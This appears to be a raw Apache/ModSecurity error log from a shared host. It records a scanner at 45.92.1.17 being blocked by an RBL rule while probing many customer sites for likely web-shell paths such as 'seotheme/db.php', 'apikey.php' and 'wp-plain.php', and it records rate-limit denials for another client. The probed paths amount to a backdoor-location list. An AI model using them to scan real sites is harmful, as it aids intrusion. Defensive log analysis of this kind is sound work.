[Tue May 26 19:59:17.184116 2026] [security2:error] [pid 93868:tid 94375] [client 45.92.1.17:57984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253JwAAAgQ"]
[Tue May 26 19:59:17.206081 2026] [security2:error] [pid 93576:tid 93772] [client 45.92.1.17:58251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkoszsvAAAADw"], referer: www.google.com
[Tue May 26 19:59:17.218914 2026] [security2:error] [pid 93868:tid 94267] [client 45.92.1.17:58013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253KQAAAZg"]
[Tue May 26 19:59:17.223108 2026] [security2:error] [pid 93576:tid 93830] [client 45.92.1.17:58239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkoszsvQAAAHY"], referer: www.google.com
[Tue May 26 19:59:17.243209 2026] [security2:error] [pid 93868:tid 94372] [client 45.92.1.17:57985] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "xllent.in"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253AwAAAgE"], referer: www.google.com
[Tue May 26 19:59:17.244231 2026] [security2:error] [pid 93576:tid 93818] [client 45.92.1.17:58346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkoszswQAAAGo"], referer: www.google.com
[Tue May 26 19:59:17.249615 2026] [security2:error] [pid 93576:tid 93797] [client 45.92.1.17:58347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPWDRMqfxdEDkoszswgAAAFU"]
[Tue May 26 19:59:17.250304 2026] [security2:error] [pid 93576:tid 93797] [client 45.92.1.17:58345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-plain.php"] [unique_id "ahWuPWDRMqfxdEDkoszswwAAAFU"], referer: www.google.com
[Tue May 26 19:59:17.259326 2026] [security2:error] [pid 93576:tid 93812] [client 45.92.1.17:58366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-plain.php"] [unique_id "ahWuPWDRMqfxdEDkoszsxQAAAGQ"], referer: www.google.com
[Tue May 26 19:59:17.269773 2026] [security2:error] [pid 93868:tid 94289] [client 45.92.1.17:58379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253LgAAAa4"], referer: www.google.com
[Tue May 26 19:59:17.275635 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr8gAAAHs"]
[Tue May 26 19:59:17.291408 2026] [security2:error] [pid 93576:tid 93740] [client 45.92.1.17:58381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPWDRMqfxdEDkoszsyAAAABw"]
[Tue May 26 19:59:17.298353 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr7wAAAEw"]
[Tue May 26 19:59:17.300125 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253LwAAAbM
[Tue May 26 19:59:17.300862 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszszQAAACY
[Tue May 26 19:59:17.302582 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszszgAAACI
[Tue May 26 19:59:17.303314 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253MAAAAe8
[Tue May 26 19:59:17.304136 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252WwAAAgM"]
[Tue May 26 19:59:17.307881 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252agAAAds"]
[Tue May 26 19:59:17.314325 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr9QAAACg"]
[Tue May 26 19:59:17.319272 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr-AAAAFQ"]
[Tue May 26 19:59:17.320704 2026] [security2:error] [pid 93868:tid 94299] [client 45.92.1.17:58423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/ndexdkzl.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253NwAAAbg"], referer: www.google.com
[Tue May 26 19:59:17.321537 2026] [security2:error] [pid 93576:tid 93779] [client 45.92.1.17:58304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkoszs0gAAAEM"], referer: www.google.com
[Tue May 26 19:59:17.324783 2026] [security2:error] [pid 93868:tid 94355] [client 45.92.1.17:58301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253OAAAAfA"], referer: www.google.com
[Tue May 26 19:59:17.329954 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszsAQAAABY"]
[Tue May 26 19:59:17.334350 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252YgAAAaE"]
[Tue May 26 19:59:17.339778 2026] [security2:error] [pid 93868:tid 94365] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252gQAAAfo"]
[Tue May 26 19:59:17.351833 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252aAAAAfU"]
[Tue May 26 19:59:17.357094 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr_wAAAHE"]
[Tue May 26 19:59:17.366592 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252uwAAAcM"]
[Tue May 26 19:59:17.375259 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252cgAAAaU"]
[Tue May 26 19:59:17.383294 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252vwAAAf8"]
[Tue May 26 19:59:17.385196 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252tAAAAgg"]
[Tue May 26 19:59:17.391696 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252uAAAAgk"]
[Tue May 26 19:59:17.404553 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252hAAAAZ8"]
[Tue May 26 19:59:17.404829 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252hQAAAbQ"]
[Tue May 26 19:59:17.406159 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszsCQAAAEs"]
[Tue May 26 19:59:17.415747 2026] [security2:error] [pid 93868:tid 94362] [client 45.92.1.17:58355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253RAAAAfc"], referer: www.google.com
[Tue May 26 19:59:17.433863 2026] [security2:error] [pid 93868:tid 94294] [client 45.92.1.17:57985] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "xllent.in"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253QwAAAbM"], referer: www.google.com
[Tue May 26 19:59:17.449928 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252wAAAAa8"]
[Tue May 26 19:59:17.456046 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp252wQAAAcQ"]
[Tue May 26 19:59:17.460568 2026] [security2:error] [pid 93576:tid 93793] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsiAAAAFE"]
[Tue May 26 19:59:17.468218 2026] [security2:error] [pid 93868:tid 94376] [client 45.92.1.17:58422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253UwAAAgU"], referer: www.google.com
[Tue May 26 19:59:17.471978 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2520wAAAcE"]
[Tue May 26 19:59:17.474668 2026] [security2:error] [pid 93868:tid 94326] [client 45.92.1.17:58425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253VQAAAdM"], referer: www.google.com
[Tue May 26 19:59:17.475616 2026] [security2:error] [pid 93868:tid 94334] [client 45.92.1.17:58497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253VwAAAds"]
[Tue May 26 19:59:17.485349 2026] [security2:error] [pid 93576:tid 93782] [client 45.92.1.17:58496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuPWDRMqfxdEDkoszs6AAAAEY"]
[Tue May 26 19:59:17.490677 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszsAgAAAGU"]
[Tue May 26 19:59:17.496843 2026] [security2:error] [pid 93868:tid 94332] [client 45.92.1.17:58446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253XAAAAdk"], referer: www.google.com
[Tue May 26 19:59:17.516662 2026] [security2:error] [pid 93868:tid 94312] [client 45.92.1.17:58458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253YAAAAcU"], referer: www.google.com
[Tue May 26 19:59:17.517963 2026] [security2:error] [pid 93868:tid 94294] [client 45.92.1.17:58518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253YgAAAbM"]
[Tue May 26 19:59:17.519197 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsOQAAAHU"]
[Tue May 26 19:59:17.520167 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2520gAAAdc"]
[Tue May 26 19:59:17.524731 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252egAAAbc"]
[Tue May 26 19:59:17.524877 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsOAAAAAo"]
[Tue May 26 19:59:17.537292 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsPgAAADU"]
[Tue May 26 19:59:17.551794 2026] [security2:error] [pid 93868:tid 94337] [client 45.92.1.17:58541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/ycvuqgrh.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253cAAAAd4"], referer: www.google.com
[Tue May 26 19:59:17.556331 2026] [security2:error] [pid 93868:tid 94294] [client 45.92.1.17:58550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/bcazvvyh.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253cwAAAbM"], referer: www.google.com
[Tue May 26 19:59:17.569885 2026] [qos:error] [pid 93868:tid 94315] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPUqK9k_ZUB2Vp253egAAAcg
[Tue May 26 19:59:17.571219 2026] [security2:error] [pid 93868:tid 94280] [client 45.92.1.17:57960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253ewAAAaU"]
[Tue May 26 19:59:17.602870 2026] [security2:error] [pid 93868:tid 94273] [client 45.92.1.17:58008] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp253EAAAAZ4"], referer: www.google.com
[Tue May 26 19:59:17.607820 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253fwAAAco
[Tue May 26 19:59:17.612131 2026] [security2:error] [pid 93576:tid 93796] [client 45.92.1.17:58493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-plain.php"] [unique_id "ahWuPWDRMqfxdEDkoszs_wAAAFQ"], referer: www.google.com
[Tue May 26 19:59:17.612202 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkoszs_gAAABY
[Tue May 26 19:59:17.622561 2026] [security2:error] [pid 93868:tid 94380] [client 45.92.1.17:58494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253gQAAAgk"], referer: www.google.com
[Tue May 26 19:59:17.626991 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztAAAAABI
[Tue May 26 19:59:17.633371 2026] [security2:error] [pid 93868:tid 94281] [client 45.92.1.17:57958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253MwAAAaY"], referer: www.google.com
[Tue May 26 19:59:17.647432 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztAQAAAC4
